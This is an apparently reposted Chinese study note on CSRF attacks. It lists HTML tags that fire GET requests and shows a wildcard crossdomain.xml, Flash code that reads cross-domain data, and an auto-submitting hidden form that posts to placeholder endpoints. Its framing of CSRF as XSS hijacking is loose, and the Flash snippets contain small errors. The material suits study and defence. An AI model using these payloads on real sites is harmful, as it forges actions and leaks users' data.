web前端阅读小记_csrf记录


csrf就是xss劫持用户去模拟操作,如果操作能够再次传播这个xss,就形成了xss蠕虫。
***

html csrf

src/href等链接地址的标签发起一个get请求

google出的href属性的标签
https://www.google.com.hk/search?sitesearch=w3school.com.cn&as_q=href&gws_rd=cr,ssl

<link href="">
<img src="">
<img lowsrc="">
<img dynsrc="">
<meta http-equiv="refresh" content="0;url= ">
<iframe src="">
<frame src="">
<script src="">
<bgsound src="">
<embed src="">
<video src="">
<audio src="">
<area href="">
<a href="">
<table background="">
@import ""
background:url("")

flash csrf

  1. 跨域获取隐私数据
    根目录存在crossdomain.xml配置文件
<?xml vesion="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

*表示任意域的flash可以请求本域的资源
恶意falsh代码:

import flash.net.*;
var loader = new URLLoader(new URLRequest("http://www.foo.com/prate"));
loader.addEventListener(Event.COMPLETE,function(){
//获取隐私数据
loader.data;
});
loader.load();
  1. 跨域提交数据操作
    html csrf
<form action="http://t.xxx.com/article/updateweet" method="post">
<input type="hidden" name="status" value="html_csrf_here" />
</form>
<script>document.forms[0].submit();</script>

但是提交后会有json数据的返回
可以用swf来进行攻击,更加隐蔽

import flash.net.URLRequest;
function post(msg){
     var url = new URLRequest("http://t.xxx.com/article/updateweet");
     var _v = new URLVariables();
     _v = "status="+msg;
     url.method = "POST";
     url.data = _v;
     //发送数据
     sendTOURL(url);
}
post('flash_csrf_here');

转载于:https://www.cnblogs.com/iamstudy/articles/csrf_notice.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值